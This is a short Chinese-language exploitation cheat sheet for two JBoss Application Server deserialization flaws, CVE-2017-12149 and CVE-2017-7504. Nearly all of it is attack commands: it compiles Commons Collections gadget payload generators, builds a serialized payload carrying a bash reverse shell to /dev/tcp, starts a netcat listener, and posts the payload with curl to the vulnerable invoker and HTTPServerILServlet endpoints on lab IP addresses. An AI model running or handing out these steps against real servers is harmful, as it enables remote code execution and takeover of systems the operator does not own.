JBoss Application Server 反序列化漏洞
CVE-2017-12149
http://192.168.11.123:8080/invoker/readonly
1:执行生成二进制的payload文件
javac -cp .:commons-collections-3.2.1.jar ReverseShellCommonsCollectionsHashMap.java
2:修改接受shell的主机IP和端口
java -cp .:commons-collections-3.2.1.jar ReverseShellCommonsCollectionsHashMap ip:port
3:新建一个终端,进行监听
nc -vv -l 4444
4:Curl向被攻击服务器发送攻击Payload。
curl http://192.168.11.123:8080/invoker/readonly --data-binary @ReverseShellCommonsCollectionsHashMap.ser
CVE-2017-7504
http://192.168.112.132:8080/jbossmq-httpil/HTTPServerILServlet/
用法实例:
1)
javac -cp .:commons-collections-3.2.1.jar ExampleCommonsCollections1.java
2)
java -cp .:commons-collections-3.2.1.jar ExampleCommonsCollections1 ‘/bin/bash -i>&/dev/tcp/ip/port<&1’
3)
nc -lvvp 4444
4)
curl http://192.168.112.132:8080/jbossmq-httpil/HTTPServerILServlet/ – data-binary @ExampleCommonsCollections1.ser